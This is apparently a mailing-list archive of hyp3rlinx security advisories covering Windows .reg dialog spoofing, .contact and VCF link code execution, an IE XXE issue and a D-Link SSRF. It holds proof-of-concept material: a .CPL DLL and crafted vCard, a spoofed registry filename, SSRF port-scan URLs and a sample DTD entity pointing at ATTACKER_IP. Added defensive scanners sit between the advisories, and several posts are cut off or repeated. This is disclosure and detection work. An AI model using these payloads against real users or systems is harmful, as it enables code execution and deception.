    print "Microsoft Internet Explorer XML External Entity 0day PoC."
    print "Files msie-xxe-0day.mht and datatears.xml Created!."
    print "Discovery: Hyp3rlinx / Apparition Security"
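Added example, not part of the advisory (it serves this post and the [**UPDATED] copy above): a triage scanner that parses an .MHT file as the MIME container it is, extracts the text/html parts and looks for the indicators the advisory names, namely an inline DTD declaring a parameter entity that references a remote resource, an automatic window.print() call and the Microsoft.XMLHTTP ActiveX object. The two embedded MHT samples are constructed; the suspicious one uses a placeholder host (ATTACKER_IP) and carries only the shape of the trigger, not an exfiltration DTD.

```python
import email
import re
from email import policy

# Indicators taken from the advisory: an internal DTD subset that declares a
# parameter entity pointing at a remote resource, a window.print() call that
# fires without user interaction, and the Microsoft.XMLHTTP ActiveX object.
INLINE_DTD_RE = re.compile(r"<!DOCTYPE\b[^>\[]*\[", re.IGNORECASE)
PARAM_ENTITY_RE = re.compile(
    r'<!ENTITY\s+%\s*(\w+)\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"([^"]+)"',
    re.IGNORECASE)
AUTO_PRINT_RE = re.compile(r"window\.print\s*\(", re.IGNORECASE)
XMLHTTP_RE = re.compile(r"ActiveXObject\s*\(\s*['\"]Microsoft\.XMLHTTP['\"]",
                        re.IGNORECASE)


def html_parts(mht_text):
    """Yield the decoded text/html bodies of an MHT file (MHT is MIME, so the
    standard email parser handles the multipart/related container)."""
    msg = email.message_from_string(mht_text, policy=policy.default)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            yield part.get_content()


def scan_mht(mht_text):
    """Collect XXE indicators from every HTML part of an MHT file."""
    findings = {"inline_dtd": False, "external_param_entities": [],
                "auto_print": False, "xmlhttp_activex": False}
    for html in html_parts(mht_text):
        if INLINE_DTD_RE.search(html):
            findings["inline_dtd"] = True
        findings["external_param_entities"].extend(PARAM_ENTITY_RE.findall(html))
        if AUTO_PRINT_RE.search(html):
            findings["auto_print"] = True
        if XMLHTTP_RE.search(html):
            findings["xmlhttp_activex"] = True
    return findings


def is_suspicious(findings):
    """A remote parameter entity in an inline DTD is the XXE hallmark; an inline
    DTD combined with an automatic print call matches the trigger the advisory
    describes, so either is enough to hold the file back for review."""
    return bool(findings["external_param_entities"]) or (
        findings["inline_dtd"] and findings["auto_print"])


# Constructed sample in the shape the advisory describes (placeholder host, no
# exfiltration DTD): a multipart/related MHT whose HTML part carries an inline
# DTD with one remote parameter entity and an automatic print call.
SAMPLE_MHT = """MIME-Version: 1.0
Content-Type: multipart/related; type="text/html";
\tboundary="=_NextPart_SAMPLE_0001"

This is a multi-part message in MIME format.

--=_NextPart_SAMPLE_0001
Content-Type: text/html; charset="UTF-8"
Content-Location: main.htm

<!DOCTYPE html [
<!ENTITY % sp SYSTEM "http://ATTACKER_IP:8000/datatears.xml">
%sp;
]>
<html><body><script>window.print();</script>Sample page</body></html>

--=_NextPart_SAMPLE_0001--
"""

# Constructed benign sample: an ordinary saved page with a standard DOCTYPE.
BENIGN_MHT = """MIME-Version: 1.0
Content-Type: multipart/related; type="text/html"; boundary="=_B2"

--=_B2
Content-Type: text/html; charset="UTF-8"

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/transitional.dtd">
<html><body>Saved page</body></html>

--=_B2--
"""

if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_MHT), ("benign", BENIGN_MHT)):
        found = scan_mht(text)
        print(label, "suspicious" if is_suspicious(found) else "clean", found)
```

The ordinary external DOCTYPE identifier in the benign file is not an indicator on its own; only an internal subset (the "[" after DOCTYPE) declaring entities is.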




[Network Access]
Remote



[Severity]
High



[Disclosure Timeline]
Vendor Notification: March 27, 2019
Vendor acknowledgement: March 27, 2019 
Case Opened: March 28, 2019
MSRC response April 10, 2019: "We determined that a fix for this issue will be 
considered in a future version of this product or service.
At this time, we will not be providing ongoing updates of the status of the fix 
for this issue, and we have closed this case."
April 10, 2019 : Public Di

Microsoft Windows .Reg File Dialog Box Message Spoofing 0day

2019-03-12 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
[+] ISR: ApparitionSec  
 

[Vendor]
www.microsoft.com


[Product]
A file with the .reg file extension is a Registration file used by the Windows 
registry. These files can contain hives, keys, and values.
.reg files can be created from scratch in a text editor or can be produced by 
the Windows registry when backing up parts of the registry.


[Vulnerability Type]
Windows .Reg File Dialog Box Message Spoofing


[CVE Reference]
N/A


[Security Issue]
The Windows registry editor allows specially crafted .reg filenames to spoof 
the default registry dialog warning box presented to an end user.
This can potentially trick unsavvy users into choosing the wrong selection 
shown on the dialog box. Furthermore, we can deny the registry editor
its ability to show the default secondary status dialog box (Win 10), thereby 
hiding the fact that our attack was successful.

Normally, when a user opens a .reg file, UAC will launch; afterwards they get 
the registry security warning dialog box asking whether they "trust the 
source", "Are you sure you want to continue?" etc., with a choice of either 
'Yes' or 'No' to select from.

However, we can inject our own messages through the filename to direct the user 
to wrongly click "Yes", as the expected "Are you sure you want to continue?" 
dialog box message is under our control. The registry dialog echoes back the 
filename plus any text we add and allows us to terminate part of its default 
security warning message. We achieve this using %-encoded characters in the 
filename like %n or %r and %0.

For example, the "do not add it to the registry" and "Are you sure you want to 
continue?" default warning messages can be done away with using %0.

This flaw lets us replace the "Are you sure you want to continue?" warning 
message with "Click Yes" or whatever else we like, potentially making a user 
think they are cancelling the registry import while the security warning 
dialog box is lying to them.

Denial of secondary registry editor status dialog box (hiding successful 
attacks) in Windows 10:

Typically, upon a successful import the registry editor pops up another dialog 
box with a status message telling us
"the keys and values contained in  have been successfully added to the 
registry".

We can obstruct that behavior to deny this secondary registry editor dialog 
from appearing by tacking on a (null) right before the
end of our filename using %1 or %25 like: 
"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

If you don't want a (null), use %3: it displays an Asian character instead, but 
still prevents the secondary registry dialog box.
You will have to manually refresh the registry key written to in order to see 
the values stored when using these dialog denial of service methods.

Note: Denial of the secondary dialog box seems to only work on Windows 10.

Behaviors I discovered playing with registry filenames that affect the dialog 
box, depending on Windows OS version you will get different results.

% - can be used for obfuscation e.g. %h%a%t%e = hate
%b will create white-space
%n makes a newline
%r makes a newline
%1 creates (null) - important as we prevent the second registry dialog from 
appearing after a successful import!
%0 Important terminates string
%25 (Windows 10) creates (null) - Important as we prevent the second registry 
dialog from appearing after a successful import!
%3 - Important as we prevent the second registry dialog from appearing after a 
successful import! (but shows asian char)
%5 (Windows 10) duplicates the default registry dialog box message by "n" 
amount of times per amount of %5 injected into the filename 
%25 (Windows 7) duplicates the default registry dialog box message by "n" 
amount of times per amount of %25 injected into the filename 
%2525 prevents registry editor from opening
%169 will show our junky filename in the dialog box (we don't want that)
%3, %197, %17 and some others change the default language shown in the registry 
dialog box to asian characters etc

Each injected character can be separated by a percent "%" sign without messing 
up our spoofed message, we can leverage this to obfuscate the end of the 
filename.
We then use %0 to terminate the message string so that the second .reg 
extension and default registry messages are not displayed in the registry 
dialog box.

The filename 
"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"
 will show as "Microsoft-Security-Update-v1.2-

[**UPDATED] Microsoft Windows .Reg File Dialog Box Message Spoofing 0day

2019-03-12 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
[+] ISR: ApparitionSec  
 

[Vendor]
www.microsoft.com


[Product]
A file with the .reg file extension is a Registration file used by the Windows 
registry. These files can contain hives, keys, and values.
.reg files can be created from scratch in a text editor or can be produced by 
the Windows registry when backing up parts of the registry.


[Vulnerability Type]
Windows .Reg File Dialog Box Message Spoofing


[CVE Reference]
N/A


[Security Issue]
The Windows registry editor allows specially crafted .reg filenames to spoof 
the default registry dialog warning box presented to an end user.
This can potentially trick unsavvy users into choosing the wrong selection 
shown on the dialog box. Furthermore, we can deny the registry editor
its ability to show the default secondary status dialog box (Win 10), thereby 
hiding the fact that our attack was successful.

Normally, when a user opens a .reg file, UAC will launch (if the user runs as 
Admin); if targeting a non-privileged user we can still hijack HKCU registry 
settings without having to deal with UAC. Afterwards they get the registry 
security warning dialog box asking whether they "trust the source", "Are you 
sure you want to continue?" etc., with a choice of either 'Yes' or 'No' to 
select from.

However, we can inject our own messages through the filename to direct the user 
to wrongly click "Yes", as the expected "Are you sure you want to continue?" 
dialog box message is under our control. The registry dialog echoes back the 
filename plus any text we add and allows us to terminate part of its default 
security warning message. We achieve this using %-encoded characters in the 
filename like %n or %r and %0.

For example, the "do not add it to the registry" and "Are you sure you want to 
continue?" default warning messages can be done away with using %0.

This flaw lets us replace the "Are you sure you want to continue?" warning 
message with "Click Yes" or whatever else we like, potentially making a user 
think they are cancelling the registry import while the security warning 
dialog box is lying to them.

Denial of secondary registry editor status dialog box (hiding successful 
attacks) in Windows 10:

Typically, upon a successful import the registry editor pops up another dialog 
box with a status message telling us
"the keys and values contained in  have been successfully added to the 
registry".

We can obstruct that behavior to deny this secondary registry editor dialog 
from appearing by tacking on a (null) right before the
end of our filename using %1 or %25 like: 
"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

If you don't want a (null), use %3: it displays an Asian character instead, but 
still prevents the secondary registry dialog box.
You will have to manually refresh the registry key written to in order to see 
the values stored when using these dialog denial of service methods.

Note: Denial of the secondary dialog box seems to only work on Windows 10.

Behaviors I discovered playing with registry filenames that affect the dialog 
box, depending on Windows OS version you will get different results.

% - can be used for obfuscation e.g. %h%a%t%e = hate
%b will create white-space
%n makes a newline
%r makes a newline
%1 creates (null) - important as we prevent the second registry dialog from 
appearing after a successful import!
%0 Important terminates string
%25 (Windows 10) creates (null) - Important as we prevent the second registry 
dialog from appearing after a successful import!
%3 - Important as we prevent the second registry dialog from appearing after a 
successful import! (but shows asian char)
%5 (Windows 10) duplicates the default registry dialog box message by "n" 
amount of times per amount of %5 injected into the filename 
%25 (Windows 7) duplicates the default registry dialog box message by "n" 
amount of times per amount of %25 injected into the filename 
%2525 prevents registry editor from opening
%169 will show our junky filename in the dialog box (we don't want that)
%3, %197, %17 and some others change the default language shown in the registry 
dialog box to asian characters etc

Each injected character can be separated by a percent "%" sign without messing 
up our spoofed message, we can leverage this to obfuscate the end of the 
filename.
We then use %0 to terminate the message string so that the second .reg 
extension and default registry messages are not displayed in the registry 
dialog box.
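Added example, not from the advisory (it serves this [**UPDATED] post and the original one above): a triage helper that tokenises a .reg filename according to the table above, reports which control sequences it carries, and approximates the text the dialog would echo, so that such attachments can be flagged before a user ever sees the spoofed prompt. Two assumptions are mine: multi-digit sequences are matched longest-first (%2525 before %25 before %2), and %r and %n are both rendered as a single line break.

```python
import re

# Percent sequences the advisory lists, with the dialog behaviour it reports
# (behaviour differs between Windows 7 and 10; the table is taken as given).
CONTROL_SEQUENCES = {
    "%0": "terminates the string; hides the default warning text that follows",
    "%1": "(null); suppresses the secondary success dialog on Windows 10",
    "%25": "(null) on Windows 10; duplicates the dialog message on Windows 7",
    "%3": "suppresses the secondary dialog but shows a foreign character",
    "%5": "duplicates the dialog message (Windows 10)",
    "%b": "white-space",
    "%n": "newline",
    "%r": "newline",
    "%17": "changes the dialog language",
    "%169": "shows the raw filename in the dialog",
    "%197": "changes the dialog language",
    "%2525": "prevents the registry editor from opening",
}

# Multi-digit sequences are matched longest-first (%2525 before %25 before %2);
# how the editor itself breaks such ties is an assumption.
TOKEN_RE = re.compile(r"%(2525|25|197|169|17|[0-9A-Za-z])")

# What the dialog shows for the sequences that have a plain textual effect.
RENDER = {"%n": "\n", "%r": "\n", "%b": " ", "%1": "\0", "%25": "\0"}


def tokenize(filename):
    """Split a filename into literal characters and %-sequences."""
    tokens, i = [], 0
    while i < len(filename):
        m = TOKEN_RE.match(filename, i)
        if m:
            tokens.append(m.group(0))
            i = m.end()
        else:
            tokens.append(filename[i])
            i += 1
    return tokens


def render_dialog_text(filename):
    """Approximate the text the registry dialog echoes for a crafted filename:
    a lone % before a character is dropped (the obfuscation trick, %h%a%t%e
    -> hate), %b becomes a space, %n/%r a line break, %1/%25 a NUL, and %0
    ends the string so the trailing '.reg' and default warning never appear."""
    out = []
    for tok in tokenize(filename):
        if tok == "%0":
            break
        if tok in RENDER:
            out.append(RENDER[tok])
        elif tok in CONTROL_SEQUENCES:
            out.append(tok)  # side effect we cannot render; keep it visible
        elif len(tok) == 2 and tok[0] == "%":
            out.append(tok[1])  # obfuscated literal character
        else:
            out.append(tok)
    return "".join(out)


def assess_reg_filename(filename):
    """Flag a .reg filename carrying any control sequence or %-obfuscation: a
    name exported by the registry editor or typed by a user has no reason to
    contain either, so their presence is enough to hold the file back."""
    tokens = tokenize(filename)
    controls = [t for t in tokens if t in CONTROL_SEQUENCES]
    obfuscated = [t for t in tokens if t.startswith("%") and t not in CONTROL_SEQUENCES]
    return {
        "controls": controls,
        "obfuscated_chars": len(obfuscated),
        "rendered": render_dialog_text(filename),
        "suspicious": bool(controls or obfuscated),
    }


if __name__ == "__main__":
    # The filename quoted in the advisory, and a normal exported backup for contrast.
    for name in ("Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg",
                 "HKCU-backup-2019-03-12.reg"):
        print(assess_reg_filename(name))
```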

The filename 
"Microsoft

Microsoft Windows ".contact" File HTML Injection Mailto: Link Remote Code Execution 0day ZDI-CAN-75

2019-01-27 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program
[+] ZDI-CAN-7591


[Vendor]
www.microsoft.com


[Product]
Microsoft .CONTACT File

A file with the CONTACT file extension is a Windows Contact file. They're used 
in Windows 10, Windows 8, Windows 7, and Windows Vista.
This is the folder where CONTACT files are stored by default: 
C:\Users\[USERNAME]\Contacts\.


[Vulnerability Type]
Mailto: HTML Link Injection Remote Code Execution


[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on 
vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target 
must visit a malicious page or open a malicious file.

The flaw is due to the processing of ".contact" files. The E-mail address field 
takes an expected e-mail address value; however, the .CONTACT file is 
vulnerable to HTML injection as no validation is performed. Therefore, if an 
attacker references an executable file using an HREF tag, clicking the link 
will run that executable without warning instead of performing the expected 
e-mail behavior. This is dangerous and would be unexpected to an end user.

The e-mail address's Mailto: link will point to an arbitrary executable, like:
p...@microsoft.com

Additionally, the executable file can live in a sub-directory and be referenced 
like "p...@microsoft.com", or attackers can use directory traversal techniques 
to point to malware sitting in, say, the target's Downloads directory, like:

p...@microsoft.com

Making matters worse, if the files are compressed and then downloaded, "mark 
of the web" (MOTW) may potentially not work as expected with certain archive 
utilities.

This advisory was initially one of three different vulnerabilities I reported 
to the Zero Day Initiative Program (ZDI), that Microsoft decided not to release 
a security fix for and to close. The first cases I reported to ZDI were the 
.VCF and .CONTACT files' Website address input fields.

This example is yet another vector affecting Windows .CONTACT files and is 
being released as the .CONTACT file issue is now publicly known.


[Exploit/POC]
Create a Windows .CONTACT file and inject the following HTML into the E-mail: 
field

p...@microsoft.com

Windows will prompt you like "The e-mail address you have entered is not a 
valid internet e-mail address. Do you still want to add this address?"

Click Yes.

Open the .CONTACT file and click the Mailto: link BOOM! Windows calculator will 
execute.


Attacker supplied code is not limited to .EXE, .CPL or .COM as .VBS files will 
also execute! :)


[POC Video URL]
https://vimeo.com/312824315


[Disclosure Timeline]
Reported to ZDI 2018-11-22 (ZDI-CAN-7591)
Another separate vulnerability affecting MS Windows .contact files affected the 
Website address input fields and was publicly disclosed January 16, 2019.
https://www.zerodayinitiative.com/advisories/ZDI-19-121/
Public disclosure : January 22, 2019
 


hyp3rlinx


Microsoft Windows VCF File Insufficient UI Warning Remote Code Execution 0day ZDI-CAN-6920

2019-01-14 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec   
[+] Zero Day Initiative Program



[Vendor]
www.microsoft.com


[Product]
A VCF file is a standard file format for storing contact information for a 
person or business.
Microsoft Outlook supports the vCard and vCalendar features. These are a 
powerful new approach to electronic Personal Data Interchange (PDI).



[Vulnerability Type]
Insufficient UI Warning Remote Code Execution



[CVE Reference]
ZDI-19-013
ZDI-CAN-6920


[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on 
vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target 
must visit a malicious page or open a malicious file.

The specific flaw exists within the processing of VCard files. Crafted data in 
a VCard file can cause Windows to display a dangerous hyperlink.
The user interface fails to provide any indication of the hazard.

An attacker can leverage this vulnerability to execute code in the context of 
the current user.


[Exploit/POC]
1) Create a directory and name it "http"; this will house the .CPL executable 
file.


2) Create a .CPL file and give it a website name. I named mine 
"www.hyp3rlinx.altervista.cpl", 
or whatever website you wish, so it can be referenced in the VCF file.

#include <windows.h>

/* hyp3rlinx */

/*
gcc -c -m32 hyp3rlinx.altervista.c
gcc -shared -m32 -o hyp3rlinx.altervista.cpl hyp3rlinx.altervista.o
*/

/* PoC payload: only pops a message box to prove the .CPL was loaded */
void ms_vcf_0day(){
    MessageBox( 0, "Continue with install?" , "TrickyDealC0der :)" ,
                MB_YESNO | MB_ICONQUESTION );
}

/* runs on every attach/detach notification once the .CPL is loaded */
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
    switch(fdwReason){
        case DLL_PROCESS_ATTACH:{
            ms_vcf_0day();
            break;
        }
        case DLL_PROCESS_DETACH:{
            ms_vcf_0day();
            break;
        }
        case DLL_THREAD_ATTACH:{
            ms_vcf_0day();
            break;
        }
        case DLL_THREAD_DETACH:{
            ms_vcf_0day();
            break;
        }
    }

    return TRUE;
}



3) make sure to rename the executable .DLL extension to a .CPL extension if you 
did not follow compile instructions above to output as ".CPL".
e.g. hyp3rlinx.altervista.dll --> hyp3rlinx.altervista.cpl



4) Create a .VCF file; I named mine "trickyDealC0der.vcf".

For the URL in the .VCF file specify a URL like...
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl

The Windows .VCF File content:

"trickyDealC0der.vcf"

BEGIN:VCARD
VERSION:4.0
N:Tricky;DealC0der;;;
FN:TrickyDealC0der
EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com
TEL;TYPE="cell,home";PREF=1:tel:+000-000-
ADR;TYPE=home;PREF=1:;;1 NYC;NY;;WC2N;USA
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
END:VCARD



Now, open the "trickyDealC0der.vcf" file and click the website link; the VCF 
file will traverse back one level to the "http" directory where
our CPL executable file lives and KABOOM! :)



[References]
https://www.zerodayinitiative.com/advisories/ZDI-19-013/



[Network Access]
Remote



[POC Video URL]
https://vimeo.com/310684003



[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
2018-07-23 - Vulnerability reported to vendor
2019-01-10 - Coordinated public release of advisory
2019-01-10 - Advisory Updated

ADDITIONAL DETAILS  
08/06/18 - ZDI reported the vulnerability to the vendor
08/07/18 - The vendor acknowledged the report and provided a tracking #
10/01/18 – The vendor requested an additional file
10/03/18 – ZDI provided added files and a new PoC
10/03/18 – The vendor advised the report did not meet the bar for service
10/05/18 – ZDI advised that we believe the report is exploitable and notified 
the vendor of the intent to 0-day on 10/16/18
10/08/18 – The vendor advised ZDI they had re-considered a fix and requested an 
extension to 01/08/19
10/09/18 – ZDI agreed to the short extension
11/14/18 – The vendor again advised ZDI of the target patch date 01/08/19
12/12/18 – The vendor provided ZDI a CVE
12/19/18 - The vendor wrote to ZDI to advise that “engineering team had decided 
to pursue the fix as v.Next” and “Microsoft has decided that it will not be 
fixing this vulnerability and we are closing this case”
12/27/18 – ZDI notified the vendor of the intent to 0-day on 01/07/18




Microsoft Windows VCF File Insufficient UI Warning Remote Code Execution 0day ZDI-CAN-6920

2019-01-14 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec   
[+] Zero Day Initiative Program



[Vendor]
www.microsoft.com


[Product]
A VCF file is a standard file format for storing contact information for a 
person or business.
Microsoft Outlook supports the vCard and vCalendar features. These are a 
powerful new approach to electronic Personal Data Interchange (PDI).



[Vulnerability Type]
Insufficient UI Warning Remote Code Execution



[CVE Reference]
ZDI-19-013
ZDI-CAN-6920


[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on 
vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target 
must visit a malicious page or open a malicious file.

The specific flaw exists within the processing of VCard files. Crafted data in 
a VCard file can cause Windows to display a dangerous hyperlink.
The user interface fails to provide any indication of the hazard.

An attacker can leverage this vulnerability to execute code in the context of 
the current user.


[Exploit/POC]
1) Create a directory named "http"; this will house the .CPL executable 
file.


2) Create a .CPL file and give it a website name. I named mine 
"www.hyp3rlinx.altervista.cpl", 
but use whatever website name you wish, so it can be referenced in the VCF file.

#include <windows.h>

/* hyp3rlinx */

/*
gcc -c -m32 hyp3rlinx.altervista.c
gcc -shared -m32 -o hyp3rlinx.altervista.cpl hyp3rlinx.altervista.o
*/

/* Proof-of-concept payload: a message box makes the load visible. */
void ms_vcf_0day(void){
    MessageBox(0, "Continue with install?", "TrickyDealC0der :)",
               MB_YESNO + MB_ICONQUESTION);
}

/* Runs whenever the host process attaches or detaches the DLL or a thread. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
    (void)hinstDLL;
    (void)lpvReserved;
    switch(fdwReason){
        case DLL_PROCESS_ATTACH:
        case DLL_PROCESS_DETACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
            ms_vcf_0day();
            break;
    }
    return TRUE;
}



3) If you did not follow the compile instructions above to output a ".CPL" 
directly, rename the executable's .DLL extension to .CPL.
e.g. hyp3rlinx.altervista.dll --> hyp3rlinx.altervista.cpl



4) Create the .VCF mail file; I named mine "trickyDealC0der.vcf".

For the URL in the .VCF mail file specify a URL like...
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl

The Windows .VCF File content:

"trickyDealC0der.vcf"

BEGIN:VCARD
VERSION:4.0
N:Tricky;DealC0der;;;
FN:TrickyDealC0der
EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com
TEL;TYPE="cell,home";PREF=1:tel:+000-000-
ADR;TYPE=home;PREF=1:;;1 NYC;NY;;WC2N;USA
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
END:VCARD



Now, open the "trickyDealC0der.vcf" file and click the website link: the VCF 
file will traverse back one level to the "http" directory where
our CPL executable file lives, and KABOOM! :)
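From the defender's side, the property to inspect is the vCard URL value: a real web link carries an http/https scheme, while the value above has no scheme, uses backslashes and ends in an executable extension. The scanner below is an added example, not part of the advisory; the function names and the SAMPLE_VCF (constructed to mirror the vCard above, plus one ordinary link) are mine.

```python
import re
from urllib.parse import urlsplit

# vCard content line (RFC 6350): NAME[;PARAM=VALUE...]:VALUE
_PROP_RE = re.compile(r"^(?P<name>[A-Za-z0-9-]+)(?:;[^:]*)?:(?P<value>.*)$")

# Extensions Windows runs when a "link" pointing at them is activated (heuristic list).
EXECUTABLE_EXTS = (".cpl", ".exe", ".scr", ".dll", ".hta", ".vbs", ".bat", ".cmd", ".lnk", ".msi")

# Constructed sample mirroring the advisory's vCard, plus one ordinary link for contrast.
SAMPLE_VCF = (
    "BEGIN:VCARD\r\n"
    "VERSION:4.0\r\n"
    "N:Tricky;DealC0der;;;\r\n"
    "FN:TrickyDealC0der\r\n"
    "URL;TYPE=home;PREF=1:http.\\\\www.hyp3rlinx.altervista.cpl\r\n"
    "URL;TYPE=work;PREF=2:https://www.example.com/about.html\r\n"
    "END:VCARD\r\n"
)

def unfold(text):
    """Join RFC 6350 folded lines: a continuation line starts with a space or tab."""
    return re.sub(r"\r?\n[ \t]", "", text)

def vcard_urls(text):
    """Return the raw value of every URL property in the vCard, in file order."""
    urls = []
    for line in unfold(text).splitlines():
        m = _PROP_RE.match(line.strip())
        if m and m.group("name").upper() == "URL":
            urls.append(m.group("value").strip())
    return urls

def classify_url(value):
    """Return the reasons a URL value looks suspicious (empty list = ordinary web link)."""
    findings = []
    parts = urlsplit(value)
    # "http.\\host\file.cpl" contains no "scheme:" at all, so urlsplit reports an empty scheme
    if parts.scheme not in ("http", "https"):
        findings.append("scheme is not http/https (malformed or non-web URL)")
    if "\\" in value:
        findings.append("contains backslashes (Windows path, not a web URL)")
    # last path component, whichever separator was used
    tail = re.split(r"[/\\]", parts.path or value)[-1].lower()
    for ext in EXECUTABLE_EXTS:
        if tail.endswith(ext):
            findings.append("target ends in executable extension " + ext)
            break
    return findings

def scan_vcard(text):
    """Map each URL value in the vCard to its findings."""
    return {u: classify_url(u) for u in vcard_urls(text)}
```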



[References]
https://www.zerodayinitiative.com/advisories/ZDI-19-013/



[Network Access]
Remote



[POC Video URL]
https://vimeo.com/310684003



[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
2018-07-23 - Vulnerability reported to vendor
2019-01-10 - Coordinated public release of advisory
2019-01-10 - Advisory Updated

ADDITIONAL DETAILS  
08/06/18 - ZDI reported the vulnerability to the vendor
08/07/18 - The vendor acknowledged the report and provided a tracking #
10/01/18 – The vendor requested an additional file
10/03/18 – ZDI provided added files and a new PoC
10/03/18 – The vendor advised the report did not meet the bar for service
10/05/18 – ZDI advised that we believe the report is exploitable and notified 
the vendor of the intent to 0-day on 10/16/18
10/08/18 – The vendor advised ZDI they had re-considered a fix and requested an 
extension to 01/08/19
10/09/18 – ZDI agreed to the short extension
11/14/18 – The vendor again advised ZDI of the target patch date 01/08/19
12/12/18 – The vendor provided ZDI a CVE
12/19/18 - The vendor wrote to ZDI to advise that “engineering team had decided 
to pursue the fix as v.Next” and “Microsoft has decided that it will not be 
fixing this vulnerability and we are closing this case”
12/27/18 – ZDI notified the vendor of the intent to 0-day on 01/07/18



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistri

D-LINK Central WifiManager CWM-100 Server Side Request Forgery CVE-2018-15517

2018-11-19 Thread apparitionsec
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: ApparitionSec  
 

***Greetz: indoushka | Eduardo B.***



[Vendor]
us.dlink.com


[Product]
D-LINK Central WifiManager (CWM 100)
Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link’s free Central WiFiManager is a web-based wireless Access Point 
management tool, enabling you to create and manage multi-site, multi-tenancy 
wireless networks.


[Vulnerability Type]
Server Side Request Forgery


[Affected Component]
MailConnect


[CVE Reference]
CVE-2018-15517


[Security Issue]
Using a web browser or a script, SSRF can be initiated against internal or 
external systems to conduct port scans by leveraging D-LINK's MailConnect component.

The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 
devices is intended to check a connection to an SMTP server but actually allows
outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by 
an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI.
This can undermine accountability of where scans or connections actually came 
from, and/or bypass the firewall. This can be automated via a script or done from a 
web browser.


[Exploit/POC]
https://VICTIM-IP/index.php/System/MailConnect/host/port/secure/

reply: OK

Scan internal port 22 SSH:

https://VICTIM-IP/index.php/System/MailConnect/host/VICTIM-IP/port/22/secure/
reply: OK
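The root cause is a connectivity check that accepts any host and port from the request. The added example below (mine, not D-Link's code) contrasts that shape with a hardened precondition: only the admin-configured SMTP server, only SMTP ports, and no loopback or link-local targets, checked before any socket is opened. The resolver and connector are injectable so the rule can be exercised offline; all names are assumptions.

```python
import ipaddress
import socket

SMTP_PORTS = {25, 465, 587}

def mail_connect_unsafe(host, port, timeout=3.0):
    """Shape of the vulnerable check: connect to whatever host/port the request names
    and report whether it worked. Nothing stops host=127.0.0.1, port=22."""
    try:
        with socket.create_connection((host, int(port)), timeout=timeout):
            return "OK"
    except (OSError, ValueError):
        return "FAIL"

def validate_mail_target(host, port, configured_host, resolve=socket.gethostbyname):
    """Hardened precondition for the same check. Returns a list of violations
    (empty = allowed). `resolve` is injectable so the rule can be tested without DNS."""
    errors = []
    if host != configured_host:
        errors.append("host is not the configured SMTP server")
    try:
        p = int(port)
    except (TypeError, ValueError):
        p = -1
    if p not in SMTP_PORTS:
        errors.append("port is not an SMTP port")
    try:
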